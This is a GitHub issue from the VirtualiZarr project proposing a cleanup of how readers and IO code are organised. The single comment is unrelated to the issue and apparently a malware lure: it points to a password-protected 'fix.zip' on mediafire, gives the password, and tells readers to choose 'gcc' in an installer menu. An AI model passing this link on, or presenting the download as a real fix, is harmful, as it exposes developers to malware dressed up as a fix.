### ISSUE TITLE
Refactor reader / IO organization internally

### ISSUE THREAD

**Issue by TomNicholas** [zarr-developers/VirtualiZarr#229]
The repo has become a little messy, especially around the readers. A few ways we could clean it up:
1. Both the references readers and the xarray accessor for serializing references to disk currently live in the same file (`xarray.py`), but they aren't really related so should be separated.
2. Some readers (dmrpp and the new WIP netcdf4 reader) will live in a `readers` subdirectory, so we should follow this pattern for all readers.
3. Kerchunk is really just an example of another reader.
4. The `FileType` object is defined in `kerchunk.py` and imported in `xarray.py` - it should be the other way around.

**Comment by ZiQiangZhou** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."
